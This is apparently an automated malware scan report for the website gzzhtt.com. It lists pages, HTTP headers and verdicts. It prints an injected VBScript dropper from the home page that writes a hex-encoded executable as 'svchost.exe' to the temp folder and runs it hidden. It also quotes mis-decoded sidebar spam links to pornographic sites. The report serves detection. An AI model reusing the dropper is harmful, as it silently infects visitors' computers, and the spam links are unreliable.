Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gzzhtt.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://gzzhtt.com/ | HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 05:20:16 GMT Accept-Ranges: bytes ETag: "dcd176dda323d01:3c49" Server: Microsoft-IIS/6.0 Content-Length: 137132 Content-Location: http://gzzhtt.com/index.html Content-Type: text/html Last-Modified: Mon, 29 Dec 2014 20:13:09 GMT | clean |
http://gzzhtt.com/index.html | 200 OK Content-Length: 137132 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://gzzhtt.com/aboutus/ | HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 05:20:22 GMT Accept-Ranges: bytes ETag: "b8e95c3ec030d01:3c49" Server: Microsoft-IIS/6.0 Content-Length: 142237 Content-Location: http://gzzhtt.com/aboutus/index.html Content-Type: text/html Last-Modified: Thu, 15 Jan 2015 12:39:03 GMT | clean |
http://gzzhtt.com/aboutus/index.html | 200 OK Content-Length: 142237 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: jftouzi.com ...[1251 bytes skipped]... /> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÎÄÕÂÁбí</h2> <ul><li><a href="http://nxtxjs.com/companys/">µðºÙ¹ý³ÌÎÄÕÂ</a></li> <li><a href="http://cnkyhg.com/jpspw/">¿ìÀÖ´ó±¾ÓªÊÞÊÞͼƬ</a></li> <li><a href="http://jftouzi.com/customer/">ww.400.ai</a></li> <li><a href="http://xzjctx.com/list/">Ô·Çíµ¤ÑݹýµÄ»ÆÉ«µçÓ°</a></li> <li><a href="http://ideast.cn/hotlm/">É«Çé1238080</a></li> <li><a href="http://cfqczs.com/contare/">ßäßäÇéÉ«Íø×îй«¸æ</a></li> <li><a href="http://nwpcc.com.cn/newslist/">gaonimei.us</a></li> <li><a href="http://cywhch.com/hotlm/">±©Å°¼éÒù& ...[3197 bytes skipped]... | ||
http://baidu.nvdei.com/js/a.js | 200 OK Content-Length: 745 Content-Type: application/x-javascript | clean |
http://gzzhtt.com/about/ | HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 05:20:27 GMT Accept-Ranges: bytes ETag: "7ab4dafeff2fd01:3c49" Server: Microsoft-IIS/6.0 Content-Length: 142353 Content-Location: http://gzzhtt.com/about/index.html Content-Type: text/html Last-Modified: Wed, 14 Jan 2015 13:42:53 GMT | clean |
http://gzzhtt.com/about/index.html | 200 OK Content-Length: 142353 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: flhfans.net ...[1147 bytes skipped]... /contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a> </div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÎÄÕÂÁбí</h2> <ul><li><a href="http://jxxlgd.com/merssdc/">³ÔʲôÄÜȥ̵</a></li> <li><a href="http://flhfans.net/jobs/">ÂèÂèºÍ¶ù×ÓµÄÂÒÂ××ö°®Ð¡</a></li> <li><a href="http://dnmsgs.com/calvv/">ºÝºÝÉäÓ°Ôº ÑÇÖÞÇéÉ«</a></li> <li><a href="http://mu-art.com/gxgm/">7wyt.com4nxx.4nxx</a></li> <li><a href="http://ml0351.com/guccii/">ÓÐû°Ù¶ÈëƬÍøÕ¾</a></li> <li><a href="http://nxtxjs.com/ktvbg/">ÎåÔÂÉ«Ìì³ÉÈËɫͼ</a></li> <li><a href="http://cghcby.com/service ...[3304 bytes skipped]... | ||
http://gzzhtt.com/html/ | HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 05:20:31 GMT Accept-Ranges: bytes ETag: "e0da1dd22431d01:3c49" Server: Microsoft-IIS/6.0 Content-Length: 141607 Content-Location: http://gzzhtt.com/html/index.html Content-Type: text/html Last-Modified: Fri, 16 Jan 2015 00:39:00 GMT | clean |
http://gzzhtt.com/html/index.html | 200 OK Content-Length: 141607 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: jftouzi.com ...[1059 bytes skipped]... ">²úÆ·ÐÅÏ¢</a> > <a href="/news_cn/">ÈȵãÐÂÎÅ</a> ><a href="/contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a> </div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÎÄÕÂÁбí</h2> <ul><li><a href="http://jftouzi.com/hotlm/">97xxoo qvod</a></li> <li><a href="http://sgsdgm.com/html/">www.585.tttco...</a></li> <li><a href="http://lngaoke.com.cn/customer/">ÓëÉ«ÓûÓйصĵçÓ°</a></li> <li><a href="http://gssyyc.com/lieres/">Çó×îÐÂÉ«ÇéÍøÖ· ÎÞ¶¾µÄ</a></li> <li><a href="http://jnlyr.com/viishow/">ÉÏÈÄÊо³ÄÚµÄǦɽÏØÊǽÎ÷î´×å¾ÓÃñÊ×ÒªµÄ¼¯¾ÓµØ£¬ÈË¿Ú¶àÈË£¬î´ÃñÄܸè 1 1 0 1 1 2012-9-14 2:1 ...[3324 bytes skipped]... | ||
http://gzzhtt.com/chanpin/ | HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 05:20:38 GMT Accept-Ranges: bytes ETag: "66fd3dc14832d01:3c49" Server: Microsoft-IIS/6.0 Content-Length: 143159 Content-Location: http://gzzhtt.com/chanpin/index.html Content-Type: text/html Last-Modified: Sat, 17 Jan 2015 11:28:45 GMT X-Died: timeout at scan.pm line 1566. | clean |
http://gzzhtt.com/chanpin/index.html | 200 OK Content-Length: 143159 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: xulimin.com ...[1355 bytes skipped]... /> <div id="side"> <div class="sideNav"> <h2>ÎÄÕÂÁбí</h2> <ul><li><a href="http://cjpad.com/items/">ÐÇÐǵãµÆ°é×àÏÂÔØ</a></li> <li><a href="http://hairycrabchina.com/gxgm/">Å®¶ùµÄ</a></li> <li><a href="http://nlpxxw.com/jobs/">jo2 112 2µç»ú²ÎÊý</a></li> <li><a href="http://xulimin.com/develop/">ÎÞ¶¾åÐÒ£ÉçÇø</a></li> <li><a href="http://lycdfy.com/sportlca/">«×«e¥² icp 030173</a></li> <li><a href="http://dio-ad.com/huasuo/">²»Öª»ðÎèÊÜŰͼ</a></li> <li><a href="http://ywscwx.com/list/">ÈöÄò²¢¼¯ÌåÅÄÕÕ</a></li> <li><a href="http://lotav.cn/lean/">iwgb-051</a></li> <li><a href="http://tlbxcc.com/contact/">²Ô¾®¿ÕÄIJ¿Ã»ÂíÈü¿ ...[3075 bytes skipped]... | ||
http://gzzhtt.com/news_cn/ | HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 05:20:41 GMT Accept-Ranges: bytes ETag: "1c4e59a46033d01:3c49" Server: Microsoft-IIS/6.0 Content-Length: 142988 Content-Location: http://gzzhtt.com/news_cn/index.html Content-Type: text/html Last-Modified: Sun, 18 Jan 2015 20:52:16 GMT | clean |
http://gzzhtt.com/news_cn/index.html | 200 OK Content-Length: 142988 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: shylmm.com ...[1115 bytes skipped]... /">²úÆ·ÐÅÏ¢</a> > <a href="/news_cn/">ÈȵãÐÂÎÅ</a> ><a href="/contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a> </div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÎÄÕÂÁбí</h2> <ul><li><a href="http://shylmm.com/project/">ÈËÊÞqvodÉ«</a></li> <li><a href="http://facesmap.net/newslist/">²»×öÌæÉíÇéÈË103</a></li> <li><a href="http://junanshan.com/cardin/">ÓÐÉùС˵ٶùµÄÄÌË®Ãâ·ÑÊÔÌý</a></li> <li><a href="http://wolongke.com/comcontent/">523a×ÛºÏÉ«</a></li> <li><a href="http://xzxsx.cn/ktvbg/">19ËêÅ®ÉúÖ³Æ÷¹Ùʵͼ</a></li> <li><a href="http://ideast.cn/burb ...[3313 bytes skipped]... | ||
http://gzzhtt.com/contact/ | HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 05:20:44 GMT Accept-Ranges: bytes ETag: "c47a8c93e34d01:3c49" Server: Microsoft-IIS/6.0 Content-Length: 142238 Content-Location: http://gzzhtt.com/contact/index.html Content-Type: text/html Last-Modified: Mon, 19 Jan 2015 23:17:04 GMT | clean |
http://gzzhtt.com/contact/index.html | 200 OK Content-Length: 142238 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: bjjrfz.com ...[1080 bytes skipped]... /">²úÆ·ÐÅÏ¢</a> > <a href="/news_cn/">ÈȵãÐÂÎÅ</a> ><a href="/contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a> </div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÎÄÕÂÁбí</h2> <ul><li><a href="http://bjjrfz.com/aspcms/">ÑÇÖÞÎÞÂë»ÆɫƬ</a></li> <li><a href="http://apace.cc/contare/">www97se38</a></li> <li><a href="http://jdzdfs.com/news/">°×»¢Ñ¨ ×ÔÅÄ</a></li> <li><a href="http://dageee.com/givenchy/">ÕÒÒÔÈÕ±¾Â×ÀíƬÀÏʦǿ¼é×Ô¼ºÑ§Éú</a></li> <li><a href="http://hanbiyuan.com/ansiu/">ww.222.com</a></li> <li><a href="http://lsylctt.com/items/">ºÝºÜéÖ ...[3342 bytes skipped]... | ||
http://gzzhtt.com/guest/ | HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 05:20:49 GMT Accept-Ranges: bytes ETag: "645afb21e35d01:3c49" Server: Microsoft-IIS/6.0 Content-Length: 142711 Content-Location: http://gzzhtt.com/guest/index.html Content-Type: text/html Last-Modified: Wed, 21 Jan 2015 02:00:20 GMT | clean |
http://gzzhtt.com/guest/index.html | 200 OK Content-Length: 142711 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: gzyhsw.com ...[1182 bytes skipped]... contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a> </div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÎÄÕÂÁбí</h2> <ul><li><a href="http://qfsmw.com/givenchy/">ÊÕË÷Èý¼¶Æ¬µçÓ°</a></li> <li><a href="http://gzyhsw.com/bmbbmw/">ËØÈË¿ì²¥×ö°®</a></li> <li><a href="http://yalishe.cn/chiujy/">ÄÐÈË´©Å®Ð¬</a></li> <li><a href="http://gdzone.net/givenchy/">www.16788.cn</a></li> <li><a href="http://hzyhwj.com/guccii/">ÍõÅÆ´ó¼úµý20101115</a></li> <li><a href="http://rcc1688.cn/fenrui/">ÒùɧÀÏʦɫͼ</a></li> <li><a href="http://xgmtjf.com/egou/">gav.com</a> ...[3268 bytes skipped]... | ||
http://gzzhtt.com/guest/0.html | 200 OK Content-Length: 17227 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: jnkbdg.com ...[1302 bytes skipped]... iv> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÈÈÃÅÎÄÕÂ</h2> <ul><li><a href="http://whsre.com.cn/gswh/">qintin</a></li> <li><a href="http://hjzszx.com/huasuo/">µç×ÓÊéÑÔÇéС˵</a></li> <li><a href="http://jnkbdg.com/service/">»ÆÉ«ÂÒÂ×С°ËØÔ</a></li> <li><a href="http://xulimin.com/news/">pepxxÓ°Ôº</a></li> <li><a href="http://htahj.com/chanel/">qvodË¿ÍàÃÀÅ®×Ôο</a></li> <li><a href="http://zqtea.cn/ansiu/">www,zse8.xom</a></li> <li><a href="http://hzuvzn.com/tdeth/">¿ì²¥µçÓ°Ò»¼¶Æ¬Ãâ·ÑÏÂÔØ</a></li> <li><a href="http://hjtx.cn/bmbbmw/">ÄÐÈËÓÃʲô×Ôο×î ...[2885 bytes skipped]... | ||
http://gzzhtt.com/guest/1.html | 200 OK Content-Length: 17151 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: shylmm.com ...[1108 bytes skipped]... ">²úÆ·ÐÅÏ¢</a> > <a href="/news_cn/">ÈȵãÐÂÎÅ</a> ><a href="/contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a></div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÈÈÃÅÎÄÕÂ</h2> <ul><li><a href="http://shylmm.com/vuiton/">2012Äê×îвÝÁñÉçÇø</a></li> <li><a href="http://lgsztm.com/contact/">51mmm.cow</a></li> <li><a href="http://sxzto.cn/guest/">ŮŮsmµõ´ò</a></li> <li><a href="http://sckxtj.com/aboutus/">08 22 hao pg</a></li> <li><a href="http://hanbiyuan.com/aboutus/">³ÉÈËÓ°Ôºa¼¶Æ¬µçÓ°</a></li> <li><a href="http://cywhch.com/gswh/">www.gaokao100. ...[3113 bytes skipped]... | ||
http://gzzhtt.com/guest/2.html | 200 OK Content-Length: 16550 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: efiglio.com ...[1234 bytes skipped]... ct/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a></div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÈÈÃÅÎÄÕÂ</h2> <ul><li><a href="http://zgyytw.com/productslist/">×ã²Ê5790Ó°ÊÓ</a></li> <li><a href="http://efiglio.com/calvv/">Å·ÃÀɫͼ¼ÒÍ¥ÂÒÂ× ¶¼Êм¤Çé</a></li> <li><a href="http://dnmsgs.com/companys/">¹ÙÍøbtÏÂÔØqqìÅÎè</a></li> <li><a href="http://zqpec.com/hugoi/">ÈýÁùÁãÍøzhan</a></li> <li><a href="http://uiguo.com/donnaka/">½ðÏ£³º ×ö¸öºÃ°Ö°Ö</a></li> <li><a href="http://bjztba.com/yves/">www.789eee.com</a></li> <li><a href="http://htahj.com/donnaka/"> ...[3165 bytes skipped]... | ||
http://gzzhtt.com/guest/3.html | 200 OK Content-Length: 17265 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: flhfans.net ...[1114 bytes skipped]... >²úÆ·ÐÅÏ¢</a> > <a href="/news_cn/">ÈȵãÐÂÎÅ</a> ><a href="/contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a></div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÈÈÃÅÎÄÕÂ</h2> <ul><li><a href="http://flhfans.net/products/">É«¸çÔÚÏßµçÓ°ÏÂÔØ</a></li> <li><a href="http://sycass.com/htcui/">1gµÈÓÚ¶àÉÙkb</a></li> <li><a href="http://khkids.com/news/">Ñ©ºü×ÀÃæÈÕÀú</a></li> <li><a href="http://dlbljc.com/build/">6666Ò¹µçÓ°</a></li> <li><a href="http://sh-bxgg.com/products/">¶¯ÎïÊÀ½ç¿ÅäÂíÊÓƵ</a></li> <li><a href="http://cxzxjp.com/fotuyt/">×ö°®Í¼Æ¬ºÝº ...[3047 bytes skipped]... | ||
http://gzzhtt.com/hugoi/ | HTTP/1.1 200 OK Date: Sat, 31 Jan 2015 05:20:56 GMT Accept-Ranges: bytes ETag: "b88eafd59733d01:3c49" Server: Microsoft-IIS/6.0 Content-Length: 141714 Content-Location: http://gzzhtt.com/hugoi/index.html Content-Type: text/html Last-Modified: Mon, 19 Jan 2015 03:27:21 GMT | clean |
http://gzzhtt.com/hugoi/index.html | 200 OK Content-Length: 141714 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: qycjiu.com ...[1055 bytes skipped]... /">²úÆ·ÐÅÏ¢</a> > <a href="/news_cn/">ÈȵãÐÂÎÅ</a> ><a href="/contact/">ÁªÏµÎÒÃÇ</a> ><a href="/guest/">¼ÓÈëÎÒÃÇ</a> </div> <div class="clear blank10"></div> <div class="newsmain"> <div id="side"> <div class="sideNav"> <h2>ÎÄÕÂÁбí</h2> <ul><li><a href="http://qycjiu.com/messages/">ÆæÆæÉ«åúA.COM</a></li> <li><a href="http://hzyhwj.com/news/">ÓéÀÖ¶¼ÊÐ ÐÂÒ»</a></li> <li><a href="http://hrktwx.com/guest/">www.se868.com</a></li> <li><a href="http://sjxy668.cn/saint/">¿ì²¥ÊÓƵÊÞÊÞÃÅ</a></li> <li><a href="http://jxxlgd.com/burberry/">ÕæÈËhgame</a></li> <li><a href="http://shiyuru.com/tedelon/">Ë®µºÔçÃç´´×÷</ ...[3383 bytes skipped]... | ||
http://gzzhtt.com/hugoi/0.html | 200 OK Content-Length: 16465 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: lycdfy.com ...[1405 bytes skipped]... br/> <div id="side"> <div class="sideNav"> <h2>ÈÈÃÅÎÄÕÂ</h2> <ul><li><a href="http://sgsdgm.com/saint/">www48wyt.com</a></li> <li><a href="http://ideast.cn/merssdc/">×ß½øÒ¹µê ¿ì²¥</a></li> <li><a href="http://dzrhwy.com/fenrui/">ÑÇÖÞ×ÔÅÄ͵ÅÄ¿ì²¥</a></li> <li><a href="http://lycdfy.com/product/">vagaaÏÂÔØ.2006</a></li> <li><a href="http://groupsms.cc/donnaka/">bl¸ßhÎÄlºÏ¼¯</a></li> <li><a href="http://jhcrafts.cn/gxgm/">wwww.kk44.com</a></li> <li><a href="http://xmttj.cn/factory/">www.uds.bjxdwz.com</a></li> <li><a href="http://gypssp.com/trades/">3¼¶»ÆƬQVOD</a></li> <li><a href="http://rusmans.com/lieres/">²·Ëã×Ó ÑÏÈï ...[2979 bytes skipped]... | ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gzzhtt.com
Result:
HTTP/1.1 200 OK
Date: Sat, 31 Jan 2015 05:20:16 GMT
Accept-Ranges: bytes
ETag: "dcd176dda323d01:3c49"
Server: Microsoft-IIS/6.0
Content-Length: 137132
Content-Location: http://gzzhtt.com/index.html
Content-Type: text/html
Last-Modified: Mon, 29 Dec 2014 20:13:09 GMT
...137132 bytes of data.
GET / HTTP/1.1
Host: gzzhtt.com
Result:
HTTP/1.1 200 OK
Date: Sat, 31 Jan 2015 05:20:16 GMT
Accept-Ranges: bytes
ETag: "dcd176dda323d01:3c49"
Server: Microsoft-IIS/6.0
Content-Length: 137132
Content-Location: http://gzzhtt.com/index.html
Content-Type: text/html
Last-Modified: Mon, 29 Dec 2014 20:13:09 GMT
...137132 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: gzzhtt.com
Referer: http://www.google.com/search?q=gzzhtt.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: gzzhtt.com
Referer: http://www.google.com/search?q=gzzhtt.com
Result:
The result is similar to the first query. There are no suspicious redirects found.